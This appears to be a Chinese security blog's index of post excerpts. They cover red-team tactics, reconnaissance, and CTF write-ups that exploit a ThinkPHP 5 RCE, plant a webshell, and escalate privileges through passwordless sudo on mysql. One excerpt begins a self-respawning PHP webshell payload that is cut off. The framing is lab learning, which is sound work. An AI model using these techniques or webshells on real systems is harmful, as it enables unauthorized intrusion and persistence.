摘要:
堡垒机都不知道你打集贸redteam? 阅读全文
该文被密码保护。 阅读全文
摘要:
为什么别人拿到一大批资产很快就有产出?如何高效、有序、合理的进行打点? 阅读全文
摘要:
flag1 进入环境,发现80端口开启,看图标疑似thinkphp,指纹识别发现确实是tp5: 一把梭哈发现存在RCE: 直接写webshell连接上线: 当前权限为www-data: 尝试权限提升,信息搜集发现/usr/bin/mysql可以无密码sudo: 看看怎么打sudo提权: ok会了,直 阅读全文
摘要:
web670 这里的check貌似是删web根目录文件,那么可以用awd的常规思路,写一个不死马: GET:?action=cmd POST:cmd=file_put_contents('a.php', '<?php ignore_user_abort(true);set_time_limit(0) 阅读全文